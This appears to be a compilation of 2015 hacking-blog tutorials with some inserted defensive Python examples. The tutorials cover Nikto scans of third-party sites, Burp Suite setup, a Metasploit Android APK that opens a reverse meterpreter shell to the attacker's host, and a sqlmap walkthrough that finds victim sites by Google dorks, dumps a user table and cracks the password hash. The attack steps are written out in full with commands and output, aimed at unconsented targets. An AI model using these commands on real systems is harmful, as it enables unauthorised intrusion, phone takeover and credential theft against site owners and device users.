Friday, May 29, 2015

Find Vulnerabilities for Any Website Using Nikto

Nikto


There are a number of tools and applications to find vulnerabilities in websites, but one of the simplest (and one of my favorites) is nikto.

This small and simple tool examines a website and reports back to you the potential vulnerabilities that it found that you could use to exploit or hack the site. In addition, it's one of the most widely used website vulnerability tools in the industry and in many circles considered the industry standard.

Although this tool is extremely useful and effective, it is NOT stealthy. Any website with an IDS or other security measures in place will detect that you are scanning it. Originally designed for security testing, it was never meant to be stealthy.
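What that lack of stealth looks like from the server side, as an added example (not part of the original post): a small detector run over constructed Apache combined-format log lines. The sample IPs and paths, the thresholds and the function names are assumptions; the User-Agent is the form Nikto sends by default.

```python
import re
from collections import defaultdict

# Apache "combined" format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$'
)


def build_sample_log():
    """Constructed sample traffic (not real logs): one browser, two scanners."""
    tpl = ('{ip} - - [29/May/2015:10:00:{sec:02d} +0000] '
           '"GET {path} HTTP/1.1" {status} 208 "-" "{agent}"')
    browser = "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0"
    nikto = "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000001)"
    lines = []
    # Normal visitor: 30 requests, two of them 404.
    for i in range(30):
        status = 404 if i in (7, 19) else 200
        lines.append(tpl.format(ip="192.168.1.50", sec=i, path=f"/page{i % 5}.html",
                                status=status, agent=browser))
    # Scanner that left the default Nikto User-Agent in place.
    for i, path in enumerate(["/cgi-bin/test.cgi", "/admin/", "/phpinfo.php"]):
        lines.append(tpl.format(ip="192.168.1.77", sec=i, path=path,
                                status=404, agent=nikto))
    # Scanner hiding behind a browser User-Agent: only its behaviour gives it away.
    for i in range(25):
        status = 200 if i == 0 else 404
        lines.append(tpl.format(ip="192.168.1.88", sec=i, path=f"/probe{i}.php",
                                status=status, agent=browser))
    return lines


def detect_scanners(lines, min_requests=20, min_404_ratio=0.8, min_paths=15):
    """Return {ip: [reasons]} for clients that look like a vulnerability scanner.

    Two independent signals (thresholds are assumptions to tune per site):
      nikto-user-agent: the User-Agent header names Nikto
      404-burst:        many requests, mostly 404, spread over many distinct paths
    """
    stats = defaultdict(lambda: {"total": 0, "not_found": 0,
                                 "paths": set(), "nikto_ua": False})
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # skip lines that are not in combined format
        s = stats[m["ip"]]
        s["total"] += 1
        s["paths"].add(m["path"])
        if m["status"] == "404":
            s["not_found"] += 1
        if "nikto" in m["agent"].lower():
            s["nikto_ua"] = True

    findings = {}
    for ip, s in stats.items():
        reasons = []
        if s["nikto_ua"]:
            reasons.append("nikto-user-agent")
        ratio = s["not_found"] / s["total"]
        if (s["total"] >= min_requests and ratio >= min_404_ratio
                and len(s["paths"]) >= min_paths):
            reasons.append("404-burst")
        if reasons:
            findings[ip] = reasons
    return findings


if __name__ == "__main__":
    for ip, reasons in sorted(detect_scanners(build_sample_log()).items()):
        print(ip, ", ".join(reasons))
```

The User-Agent check alone is easy to defeat by changing the header, which is why the behavioural 404-burst signal is evaluated separately.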


Step 1: Fire Up Kali & Open Nikto


Let's fire up Kali and get started with nikto. Once we have Kali up and running, go to Kali Linux -> Vulnerability Analysis -> Misc Scanners -> nikto, like in the screenshot below.


Although there are many options in using nikto, we will limit ourselves here to the basic syntax, such as this:

nikto -h <IP or hostname>


Step 2: Scan the Web Server


Let's start with a safe web server on our own network. In this case, I have started the http service on another machine on my network. There is not a website hosted by this machine, just the web server. Let's scan it for vulnerabilities by typing:


nikto -h 192.168.1.104

Nikto responds with a lot of information, as you can see below.



First, it tells us the server is Apache 2.2.14, probably on Ubuntu. It nailed this info and gives up more information on other potential vulnerabilities on this web server.

Note near the bottom that it identifies some vulnerabilities with the OSVDB prefix.

This is the Open Source Vulnerability Database, a database of known vulnerabilities maintained at www.osvdb.org, in addition to other databases I covered, such as SecurityFocus and Microsoft's Technet.



Step 3: Scan the Site


Let's see what nikto can tell us about this site.

nikto -h webscantest.com



Once again, it identifies the server (Apache) and then proceeds to identify numerous potential vulnerabilities prefixed with OSVDB.

We can take a look at that website at www.osvdb.org to learn more about these vulnerabilities.



Now, let's use this site to find information on one of the vulnerabilities identified by nikto as OSVDB-877. We can put that reference number into the search function and it retrieves the following page.



Note that in the lower half of this page there are cross-references to the various information sources about this vulnerability, as well as references to tools and filters such as Nikto, Nessus, and Snort.





Scan Facebook


Finally, let's point nikto at www.facebook.com.

nikto -h facebook.com



As you can see, Facebook is tightly secured with few vulnerabilities. As you can imagine, if Facebook weren't secure, every script-kiddie on the planet would be hacking it to see who his true love is chatting with online.

Setting Up BurpSuite Web Hacking Tool with Firefox and FoxyProxy


Burp Suite is an integration of various tools put together for performing security testing of Web applications. Burp Suite helps the penetration tester in the entire testing process from the mapping phase through to identifying vulnerabilities and exploiting them. This Burp Suite guide will help you to download and set up the BurpSuite web hacking tool with Firefox and FoxyProxy.

Web application vulnerabilities pose a large amount of risk to enterprise systems. Many web application vulnerabilities are a result of a lack of input sanitization in the web application. In short, web applications take some form of input from the user and may process that information to serve content on the web application, or retrieve data from other parts of the system. If input isn’t properly sanitized, an attacker can send in a non-standard input to misuse the web application.

In an effort to share techniques and knowledge learned over our time in the application security field, we'll be doing a series of blog posts on introducing people to Burp Suite. This first post will be an overview of how to get started with Burp and a browser for testing. We'll continue this series with other topics related to getting started in application security and testing web applications with Burp. Enjoy!


Everyone has their favorite security tools, but when it comes to mobile and web applications I’ve always found myself looking BurpSuite square in the eye. It always seems to have everything I need and for folks just getting started with web application testing it can be a challenge putting all of the pieces together. I’m just going to go through the installation to paint a good picture of how to get it up quickly.


BurpSuite is freely available with everything you need to get started and when you’re ready to cut the leash, the professional version has some handy tools that can make the whole process a little bit easier. I’ll also go through how to install FoxyProxy which makes it much easier to change your proxy setup, but we’ll get into that a little later.



Requirements and assumptions:

Mozilla Firefox 3.1 or Later
Knowledge of Firefox Add-ons and installation
The Java Runtime Environment installed

Download BurpSuite from http://portswigger.net/burp/download.html and make a note of where you save it.

Install the FoxyProxy Standard add-on for Firefox from https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/

Navigate to the directory you’ve downloaded BurpSuite to and double click the burpsuite_free_vx.x.jar file, in this example the file should be burpsuite_free_v1.5.jar
If this is your first time running the JAR file, it may take a minute or two to load, so be patient and wait. Soon you’ll see the loading splash screen followed by the program.

                  



BurpSuite is a proxy, which means that you’ll be forwarding all of the web traffic from your browser through BurpSuite so that you can see each HTTP Request and Response and manipulate it to your heart’s content. First, let’s configure this thing.

Click on the Proxy tab located on the top row, and then click the options tab just below in the second row.


You’ll notice all of the proxy settings available here, but there are a few we want to focus on to get started. First, look at the Proxy Listener section and make sure that the checkbox under the “Running” column is selected and that the interface reads 127.0.0.1:8080.


Next, make sure that the checkboxes for “Intercept requests based on the following rules” and “Intercept Responses based on the following rules” are checked in the following sections.




This will ensure that you capture both HTTP Requests you send and the Responses from the server.
Now, let’s head into Firefox and configure FoxyProxy to route traffic through Burp for analysis. Open up Firefox, and note the FoxyProxy icon next to the address bar.


Left click on the icon to open the configuration screen.

Your default screen will look something like this.



We will want to add a new proxy by clicking the “Add New Proxy” button. This will open up a window and put you right on the Proxy Details screen with the radio button “Manual Proxy Configuration” selected. This is exactly what we want. All we have to do here is fill in the same settings we placed in BurpSuite: IP address equal to “127.0.0.1” and port equal to “8080”.



Next head over to the “General Tab” at the top and fill in the details. It’s best to call it something you recognize, like “BurpSuite”


Go ahead and click OK and now we can start using our proxy.

Once you save, you may see a notice that you haven’t enabled any whitelisted URL patterns. This is one of the features in FoxyProxy that will allow you to use multiple proxy services based on specific URL patterns. We won’t get into that in this guide, so for now just ignore the message and click “Yes”.
You’ll now see your newly added proxy on the list. Make sure the enabled column is checked and click close.
Now, remember that icon from earlier next to the address bar? If you right click, you’ll be able to select “Use proxy BurpSuite for all URLs”. Make sure Burp is running and visit any website you like. We’ll go to Google for now, so just type http://www.google.com into the address bar and click Go. If it appears that Firefox is taking forever to connect, it’s likely because Burp is capturing the request. If not, you may have to enable intercepting in Burp, so let’s go over that now.

Go to BurpSuite and select “Proxy” on the top row of tabs, and “Intercept” in the second row of tabs, both highlighted orange here.



You will notice that my request to Google has been captured by BurpSuite. If you don’t see this you want to make sure that the “Intercept is On” button appears as circled in orange. If it’s set to “Intercept is off” your traffic is likely going through Burp but you’re not watching each request.

Moving forward, you can click the “Forward” button and look at each request and response as it comes through. You will see a blank white screen if there are no more requests or responses to pass.

If we head back to the browser you may see this message if you’re using Google over HTTPS.


You can add an exception every time this happens when you’re using a proxy, but that can get a little annoying. We can also set Firefox to trust the Burp certificate so that we don’t get this error.

The Professional version of Burp allows us to get the certificate pretty easily, but in the free version we have to do a little work.

Since we're already on a page using HTTPS we can click "Add Exception...". If you navigated away from the page, simply visit any https enabled website and go from there.




Next you'll see the add exception screen which will allow us to view the certificate. Go ahead and click the View... button.



Here, you'll see that you have a certificate your browser is warning you about. Since we know that the Portswigger CA is us, we can go ahead and install this into Firefox, but in order to do this we'll need to export the certificate and note the location. Some important things to note here:

Make sure you select "PortSwigger CA" under the details of the certificate viewer before clicking export.


Make sure you save as the X.509 .crt, .pem file type.


Click Save, and note the location.

We have to make sure this certificate is installed in Firefox. Accomplishing this is as easy as going into the options of Firefox and selecting "View Certificates" under "Advanced" in the Firefox Options pane.


On the next screen we just want to select import.


Select the certificate you exported earlier from the noted location and click OK. You will be prompted to select the type of trust for the certificate. You'll want to select "Trust this CA to identify websites"


If done correctly you should be able to find the "Portswigger CA" Certificate name under the "Authorities" tab.


Now, you should be able to navigate to any SSL site through Burp without being prompted to trust the certificate.

The next tweak we want to make is to disable Google Safebrowsing. Safebrowsing is obviously enabled for a reason, but it can cause unwanted traffic during tests, so we will disable it by going to:

  • Firefox button > Options > Options (or Tools > Options) > Security

and unchecking both "Block reported attack sites" and "Block reported web forgeries".




I certainly hope this guide has been helpful in getting you up and running easily with BurpSuite. We'll be posting some additional tidbits in the near future on using Burp effectively.

Hack Android Remotely Using Kali Linux




 Let's start,

 Creating a booby trapped APK file


Now we need to create the APK that will include a remote shell. To do so, we will use the msfpayload command from Metasploit.

1. In Kali Linux, open a terminal prompt and type:

sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R >app.apk

(Replace the highlighted part with your Kali Linux IP address for the LHOST address and your forwarded port for the LPORT address.)



The msfpayload command takes one of the meterpreter payloads and allows you to create a stand alone file with it.

Once this is run, a file called “app.apk” will be created:





2. Now just send this file to your Android device, I used a Smart Phone in this instance.

3. When the file is installing on the Android, it will come up like all apps and show you what capabilities it wants access to on your phone. It lists like every possibility I think, basically total access to the phone. This should be a warning to users that this isn’t an app that they should be running!

Now that the “evil” app is installed, we need to set Metasploit up to listen for incoming connections.

4. In Kali, start Metasploit from the menu or by typing “msfconsole” in a Terminal window.

5. Once Metasploit starts, type in the following to create a listener (enter your Kali IP address for lhost):


use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.16
set lport 4444


Then just type exploit to start the handler:





6. Run the App on your Android device. It should show up as a big “M” icon with a name something like “Main Activity”.

7. A big button will appear on your phone that says, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created.

On your Metasploit system you should see this:





An active session is created and it drops you automatically into a meterpreter prompt.

8. From here you can type “sysinfo” to get information on the device:




9. You can see the processes running by typing, “ps”:



You are done!

Now you can surf the Android device remotely by using standard Linux commands like ls, pwd, and cd. The Download directory usually has interesting things in it.

Though it errored out on mine, you can type “webcam_list” to get a list of the phone’s web cams, then “webcam_snap” to take a snapshot from the webcam.

Typing “help” at a meterpreter prompt will list all the commands that are available.

We can also run the shell command that will drop us into a direct Terminal shell if we want:



meterpreter > shell
Process 1 created.
Channel 1 created.
ls


The Android phone in this example was not rooted, so I could not access the stored passwords, texts or phone logs.

But if the phone was rooted, I should have been able to access them… Remotely…

This should be noted by people who have rooted their phone!

And that is it! One wrong app installed by a user and an attacker could get remote access to your phone or other Android device. Did I mention that the phone was running an Anti-Virus program from a major vendor? It had no problems with letting my remote shell run…

Thursday, May 28, 2015

Use SQLMAP SQL Injection to hack a website and database in Kali Linux


SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application’s software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database. In this guide I will show you how to use SQLMAP SQL Injection on Kali Linux to hack a website (more specifically, its database) and extract usernames and passwords.


What is SQLMAP

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features

  1. Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
  2. Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
  3. Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  4. Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  5. Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  6. Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry.
  7. Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass.
  8. Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  9. Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  10. Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
  11. Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.
[Source: www.sqlmap.org]
Be considerate to the user who spends time and effort to put up a website and possibly depends on it to make ends meet. Your actions might impact someone in a way you never wished for. I think I can’t make it any clearer.
So here goes:

Step 1: Find a Vulnerable Website

This is usually the toughest bit and takes longer than any other step. Those who know how to use Google Dorks know this already, but in case you don’t, I have put together a number of strings that you can search in Google. Just copy and paste any of the lines into Google and Google will show you a number of search results.

Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website

This list is really long. It took me a long time to collect them. If you know SQL, then you can add more here. Put them in the comment section and I will add them here.


Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection

For every string shown above, you will get hundreds of search results. How do you know which is really vulnerable to SQLMAP SQL Injection? There are multiple ways, and I am sure people would argue which one is best, but to me the following is the simplest and most conclusive.
Let’s say you searched using this string inurl:item_id= and one of the search results shows a website like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15
Just add a single quotation mark at the end of the URL. (Just to be sure: " is a double quotation mark and ' is a single quotation mark.)
So now your URL will look like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'
If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirects you to a different page, move on to the next site in your Google search results page.
See example error below in the screenshot. I’ve obscured everything including URL and page design for obvious reasons.
Examples of SQLi Errors from Different Databases and Languages

Microsoft SQL Server

Server Error in ‘/’ Application. Unclosed quotation mark before the character string ‘attack;’.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string ‘attack;’.

MySQL Errors

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore.com/buystuff.php on line 12
Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’ at line 12

Oracle Errors

java.sql.SQLException: ORA-00933: SQL command not properly ended at oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)
Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated

PostgreSQL Errors

Query failed: ERROR: unterminated quoted string at or near “‘’’”
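Why the appended quote produces errors like the ones listed above, and the fix, as an added example (not from the original post). It uses an in-memory SQLite database; the item table and the two handler functions are hypothetical stand-ins for a script like item.cgi.

```python
import re
import sqlite3


def make_db():
    """Constructed sample data: a tiny catalogue table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE item (item_id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO item VALUES (15, 'widget'), (16, 'gadget');
        """
    )
    return conn


def handle_vulnerable(conn, item_id):
    """The flawed pattern: the parameter is pasted into the SQL text and the
    database error is echoed back to the client."""
    query = "SELECT name FROM item WHERE item_id = " + item_id
    try:
        rows = conn.execute(query).fetchall()
    except sqlite3.Error as exc:
        # Leaking the driver's message is what makes the quote test conclusive.
        return 500, "SQL error: " + str(exc)
    return 200, ", ".join(row[0] for row in rows)


def handle_hardened(conn, item_id):
    """The corrected pattern: validate the type, bind the value as a parameter,
    and never return database error text."""
    if not re.fullmatch(r"[0-9]{1,9}", item_id):
        return 400, "Bad request"
    try:
        rows = conn.execute(
            "SELECT name FROM item WHERE item_id = ?", (int(item_id),)
        ).fetchall()
    except sqlite3.Error:
        return 500, "Internal error"  # log the details server-side instead
    if not rows:
        return 404, "Not found"
    return 200, rows[0][0]


if __name__ == "__main__":
    db = make_db()
    for value in ("15", "15'"):
        print(repr(value), "vulnerable ->", handle_vulnerable(db, value))
        print(repr(value), "hardened   ->", handle_hardened(db, value))
```

With bound parameters the quote never reaches the SQL parser as syntax, so the request fails validation instead of breaking the statement.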

Step 2: List DBMS databases using SQLMAP SQL Injection

As you can see from the screenshot above, I’ve found a website vulnerable to SQLMAP SQL Injection. Now I need to list all the databases in that vulnerable database (this is also called enumerating number of columns). As I am using SQLMAP, it will also tell me which one is vulnerable.

Run the following command against your vulnerable website:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs
In here:
sqlmap = Name of sqlmap binary file
-u = Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15”)
--dbs = Enumerate DBMS databases
See screenshot below.

This command reveals quite a bit of interesting info:
web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'
So, we now have two databases that we can look into. information_schema is a standard database for almost every MySQL database. So our interest would be in the sqldummywebsite database.

Step 3: List tables of target database using SQLMAP SQL Injection

Now we need to know how many tables this sqldummywebsite database has and what their names are. To find out that information, use the following command:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables
Sweet, this database has 8 tables.
[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info
And of course we want to check what’s inside the user_info table using SQLMAP SQL Injection, as that table probably contains usernames and passwords.

Step 4: List columns on target table of selected database using SQLMAP SQL Injection

Now we need to list all the columns on target table user_info of sqldummywebsite database using SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy, run the following command:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns

This returns 5 entries from target table user_info of sqldummywebsite database.
[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)

AHA! This is exactly what we are looking for … target columns user_login and user_password.

Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection

SQLMAP SQL Injection makes it easy! Just run the following command again:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump

Guess what, we now have the username from the database:
[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes

Almost there, we now only need the password for this user. The next step shows just that.

Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection

You’re probably getting used to how to use the SQLMAP SQL Injection tool. Use the following command to extract the password for the user.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump

TADA!! We have the password.
[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+


But hang on, this password looks funny. This can’t be someone’s password. Someone who leaves their website vulnerable like that just can’t have a password like that.
That is exactly right. This is a hashed password, which means we need to crack the hash to recover the original password.
I have covered password cracking extensively in the Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux post. If you’ve missed it, you’re missing out on a lot.

I will cover it in short here but you should really learn how to use hashcat.

Step 7: Cracking password

So the hashed password is "24iYBc17xK0e.". How do you know what type of hash that is?

Step 7.a: Identify Hash type

Luckily, Kali Linux provides a nice tool that we can use to identify which type of hash this is. In the command line, type in the following command and paste the hash value at the prompt:
hash-identifier

Excellent. So this is a DES(Unix) hash.

Step 7.b: Crack HASH using cudahashcat

First of all I need to know which code to use for DES hashes. So let’s check that:
cudahashcat --help | grep DES

So it’s either 1500 or 3100. But it was a MySQL database, so it must be 1500.
I am running a computer that’s got an NVIDIA graphics card. That means I will be using cudaHashcat. On my laptop, I have an AMD ATI graphics card, so I will be using oclHashcat on my laptop. If you’re on VirtualBox or VMWare, neither cudahashcat nor oclhashcat will work. You must install Kali on either a persistent USB or a hard disk. Instructions are on the website, search around.
I saved the hash value 24iYBc17xK0e. in DES.hash file. Following is the command I am running:
cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt

Interesting find: Usual Hashcat was unable to determine the code for DES hash (not in its help menu). However, both cudaHashcat and oclHashcat found and cracked the key.
Anyhow, so here’s the cracked password: abc123. 24iYBc17xK0e.:abc123
Sweet, we now even have the password for this user.
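For the site owner, the lesson of Step 7 is that a 13-character DES(Unix) value in a password column is a finding in itself: traditional DES crypt uses a 12-bit salt and only the first 8 characters of the password. The following added example (not from the original post) audits stored values by format and shows a salted scrypt replacement; the scrypt$... storage layout, the function names and the sample rows are assumptions of this example.

```python
import base64
import hashlib
import hmac
import os
import re

# Traditional DES crypt(3): 2-char salt + 11-char digest, alphabet ./0-9A-Za-z
DESCRYPT_RE = re.compile(r"[./0-9A-Za-z]{13}")
# Schemes that should be migrated (policy choice made for this example).
WEAK_SCHEMES = {"descrypt", "md5crypt", "unsalted-hex", "unknown"}


def classify_hash(stored):
    """Name the storage scheme of a password column value by its format."""
    if stored.startswith("scrypt$"):
        return "scrypt"
    if stored.startswith(("$2a$", "$2b$", "$2y$")):
        return "bcrypt"
    if stored.startswith("$6$"):
        return "sha512crypt"
    if stored.startswith("$1$"):
        return "md5crypt"
    if DESCRYPT_RE.fullmatch(stored):
        return "descrypt"
    if re.fullmatch(r"[0-9a-fA-F]{32}|[0-9a-fA-F]{40}", stored):
        return "unsalted-hex"  # length of a bare MD5 or SHA-1 digest
    return "unknown"


def hash_password(password, n=2**14, r=8, p=1):
    """Hash with scrypt and a random 16-byte salt; parameters travel with the hash."""
    salt = os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=n, r=r, p=p, dklen=32)
    enc = lambda raw: base64.b64encode(raw).decode()
    return f"scrypt${n}${r}${p}${enc(salt)}${enc(digest)}"


def verify_password(password, stored):
    """Recompute the scrypt digest with the stored parameters, compare in constant time."""
    _, n, r, p, salt_b64, digest_b64 = stored.split("$")
    expected = base64.b64decode(digest_b64)
    actual = hashlib.scrypt(password.encode(), salt=base64.b64decode(salt_b64),
                            n=int(n), r=int(r), p=int(p), dklen=len(expected))
    return hmac.compare_digest(actual, expected)


def weak_accounts(rows):
    """rows: iterable of (user_login, user_password); return logins to migrate."""
    return [login for login, stored in rows if classify_hash(stored) in WEAK_SCHEMES]


if __name__ == "__main__":
    # Constructed rows: the first reuses the hash shown in the article.
    rows = [("userX", "24iYBc17xK0e."), ("userY", hash_password("a long passphrase"))]
    for login, stored in rows:
        print(login, classify_hash(stored))
    print("migrate:", weak_accounts(rows))
```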

Conclusion

Thanks for reading and visiting my website.
There are many other ways to get into a database or obtain user information. You should practice such techniques on websites that you have permission to test.
Please share and let everyone know how to test their websites using this technique.